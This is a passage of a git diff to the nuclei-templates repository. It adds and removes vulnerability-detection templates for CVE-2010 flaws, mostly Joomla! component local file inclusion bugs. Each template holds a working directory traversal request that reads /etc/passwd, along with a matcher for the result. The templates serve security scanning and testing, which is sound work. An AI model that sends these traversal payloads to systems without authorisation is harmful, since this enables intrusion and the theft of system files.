b/nuclei-templates/CVE-2010/CVE-2010-1491.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1491 + +info: + name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12318 + - https://www.cvedetails.com/cve/CVE-2010-1491 + - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt + - http://secunia.com/advisories/39533 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1491 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1494.yaml b/nuclei-templates/CVE-2010/CVE-2010-1494.yaml new file mode 100644 index 0000000000..db3b3fdb9f --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1494.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1494 + +info: + name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12113 + - https://www.cvedetails.com/cve/CVE-2010-1494 + - http://www.osvdb.org/63943 + - http://www.exploit-db.com/exploits/12113 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1494 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1533.yaml b/nuclei-templates/CVE-2010/CVE-2010-1533.yaml new file mode 100644 index 0000000000..0ca3569213 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1533.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1533 + +info: + name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12142 + - https://www.cvedetails.com/cve/CVE-2010-1533 + - http://secunia.com/advisories/39258 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1533 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1535.yaml b/nuclei-templates/CVE-2010/CVE-2010-1535.yaml deleted file mode 100644 index 9b6bbe7ec5..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1535.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-1535 - -info: - name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12151 - - https://www.cvedetails.com/cve/CVE-2010-1535 - - http://secunia.com/advisories/39254 - classification: - cve-id: CVE-2010-1535 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1658.yaml b/nuclei-templates/CVE-2010/CVE-2010-1658.yaml deleted file mode 100644 index aae12dd013..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1658.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1658 - -info: - name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12427 - - https://www.cvedetails.com/cve/CVE-2010-1658 - - http://www.vupen.com/english/advisories/2010/1007 - - http://secunia.com/advisories/39600 - classification: - cve-id: CVE-2010-1658 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/27 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1718.yaml b/nuclei-templates/CVE-2010/CVE-2010-1718.yaml new file mode 100644 index 0000000000..330a7e33cf --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1718.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1718 + +info: + name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12282 + - https://www.cvedetails.com/cve/CVE-2010-1718 + - http://secunia.com/advisories/39521 + - http://www.securityfocus.com/bid/39545 + classification: + cve-id: CVE-2010-1718 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1719.yaml b/nuclei-templates/CVE-2010/CVE-2010-1719.yaml new file mode 100644 index 0000000000..5d51b37d14 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1719.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1719 + +info: + name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12233 + - https://www.cvedetails.com/cve/CVE-2010-1719 + - http://osvdb.org/63806 + - http://www.exploit-db.com/exploits/12233 + classification: + cve-id: CVE-2010-1719 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1722.yaml b/nuclei-templates/CVE-2010/CVE-2010-1722.yaml new file mode 100644 index 0000000000..9fb0c0d11a --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1722.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1722 + +info: + name: Joomla! Component Online Market 2.x - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12177 + - https://www.cvedetails.com/cve/CVE-2010-1722 + - http://secunia.com/advisories/39409 + - http://www.exploit-db.com/exploits/12177 + classification: + cve-id: CVE-2010-1722 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1871.yaml b/nuclei-templates/CVE-2010/CVE-2010-1871.yaml deleted file mode 100644 index 2377160816..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1871.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: CVE-2010-1871 -info: - name: JBoss Seam 2 Code Execution - author: medbsq - severity: high -# - https://www.cvebase.com/cve/2010/1871 -requests: - - method: GET - path: - - "{{BaseURL}}:8080/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - matchers-condition: and - matchers: - - type: word - words: - - "java.lang." - - "For input string: \"zie\"" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1875.yaml b/nuclei-templates/CVE-2010/CVE-2010-1875.yaml deleted file mode 100644 index a28222ddb1..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1875.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1875 - -info: - name: Joomla! Component Property - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11851 - - https://www.cvedetails.com/cve/CVE-2010-1875 - - http://secunia.com/advisories/39074 - - http://www.securityfocus.com/bid/38912 - classification: - cve-id: CVE-2010-1875 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1953.yaml b/nuclei-templates/CVE-2010/CVE-2010-1953.yaml deleted file mode 100644 index 5a2a33c919..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1953.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2010-1953 - -info: - name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12288 - - https://www.cvedetails.com/cve/CVE-2010-1953 - - http://www.vupen.com/english/advisories/2010/0927 - - http://www.exploit-db.com/exploits/12288 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1953 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1955.yaml b/nuclei-templates/CVE-2010/CVE-2010-1955.yaml deleted file mode 100644 index bdb1172ecd..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1955.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1955 - -info: - name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12238 - - https://www.cvedetails.com/cve/CVE-2010-1955 - - http://www.securityfocus.com/bid/39508 - - http://secunia.com/advisories/39473 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1955 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1979.yaml b/nuclei-templates/CVE-2010/CVE-2010-1979.yaml new file mode 100644 index 0000000000..3b1f768585 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1979.yaml @@ -0,0 +1,33 @@ +id: CVE-2010-1979 + +info: + name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12088 + - https://www.cvedetails.com/cve/CVE-2010-1979 + - http://secunia.com/advisories/39360 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1979 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1980.yaml b/nuclei-templates/CVE-2010/CVE-2010-1980.yaml deleted file mode 100644 index c251891840..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1980.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-1980 - -info: - name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12085 - - https://www.cvedetails.com/cve/CVE-2010-1980 - - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt - - http://www.exploit-db.com/exploits/12085 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1980 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1981.yaml b/nuclei-templates/CVE-2010/CVE-2010-1981.yaml new file mode 100644 index 0000000000..00c934810c --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-1981.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-1981 + +info: + name: Joomla! Component Fabrik 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12087 + - https://www.cvedetails.com/cve/CVE-2010-1981 + - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt + - http://www.exploit-db.com/exploits/12087 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1981 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1983.yaml b/nuclei-templates/CVE-2010/CVE-2010-1983.yaml deleted file mode 100644 index 48292064e9..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1983.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-1983 - -info: - name: Joomla! Component redTWITTER 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12055 - - https://www.cvedetails.com/cve/CVE-2010-1983 - - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt - - http://www.exploit-db.com/exploits/12055 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1983 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2033.yaml b/nuclei-templates/CVE-2010/CVE-2010-2033.yaml new file mode 100644 index 0000000000..4e0eed3c3d --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-2033.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-2033 + +info: + name: Joomla Percha Categories Tree 0.6 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html + - https://www.cvedetails.com/cve/CVE-2010-2033 + - http://secunia.com/advisories/39873 + - http://www.securityfocus.com/bid/40244 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2033 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2037.yaml b/nuclei-templates/CVE-2010/CVE-2010-2037.yaml deleted file mode 100644 index 0ec135d12a..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2037.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2037 - -info: - name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34005 - - https://www.cvedetails.com/cve/CVE-2010-2037 - - http://www.securityfocus.com/bid/40244 - - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2037 - tags: cve,cve2010,lfi,joomla - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2045.yaml b/nuclei-templates/CVE-2010/CVE-2010-2045.yaml deleted file mode 100644 index 131b2df9e3..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2045.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2010-2045 - -info: - name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12595 - - https://www.cvedetails.com/cve/CVE-2010-2045 - - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2045 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2050.yaml b/nuclei-templates/CVE-2010/CVE-2010-2050.yaml deleted file mode 100644 index 2c6104b29d..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2050.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2050 - -info: - name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12611 - - https://www.cvedetails.com/cve/CVE-2010-2050 - - http://www.securityfocus.com/bid/40185 - - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2050 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2128.yaml b/nuclei-templates/CVE-2010/CVE-2010-2128.yaml new file mode 100644 index 0000000000..1237eb6309 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-2128.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-2128 + +info: + name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12607 + - https://www.cvedetails.com/cve/CVE-2010-2128 + - http://secunia.com/advisories/39832 + - http://www.exploit-db.com/exploits/12607 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2128 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml b/nuclei-templates/CVE-2010/CVE-2010-2259.yaml new file mode 100644 index 0000000000..0d1cebd3bb --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-2259.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-2259 + +info: + name: Joomla! Component com_bfsurvey - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10946 + - https://www.cvedetails.com/cve/CVE-2010-2259 + - http://secunia.com/advisories/37866 + - http://www.exploit-db.com/exploits/10946 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2259 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2507.yaml b/nuclei-templates/CVE-2010/CVE-2010-2507.yaml new file mode 100644 index 0000000000..64b3ed8517 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-2507.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-2507 + +info: + name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/13981 + - https://www.cvedetails.com/cve/CVE-2010-2507 + - http://osvdb.org/65674 + - http://secunia.com/advisories/40297 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2507 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2680.yaml b/nuclei-templates/CVE-2010/CVE-2010-2680.yaml new file mode 100644 index 0000000000..c7d3043166 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-2680.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-2680 + +info: + name: Joomla! Component jesectionfinder - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/14064 + - https://www.cvedetails.com/cve/CVE-2010-2680 + - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt + - http://www.securityfocus.com/bid/41163 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2680 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2682.yaml b/nuclei-templates/CVE-2010/CVE-2010-2682.yaml deleted file mode 100644 index c7397e6665..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2682.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2682 - -info: - name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/14017 - - https://www.cvedetails.com/cve/CVE-2010-2682 - - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt - - http://www.exploit-db.com/exploits/14017 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2682 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2857.yaml b/nuclei-templates/CVE-2010/CVE-2010-2857.yaml new file mode 100644 index 0000000000..8450d34103 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-2857.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-2857 + +info: + name: Joomla! Component Music Manager - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. + reference: + - https://www.exploit-db.com/exploits/14274 + - https://www.cvedetails.com/cve/CVE-2010-2857 + - http://www.securityfocus.com/bid/41485 + - http://www.exploit-db.com/exploits/14274 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-2857 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2861.yaml b/nuclei-templates/CVE-2010/CVE-2010-2861.yaml new file mode 100644 index 0000000000..2c20cb936e --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-2861.yaml @@ -0,0 +1,42 @@ +id: CVE-2010-2861 + +info: + name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI + author: pikpikcu + severity: high + description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) 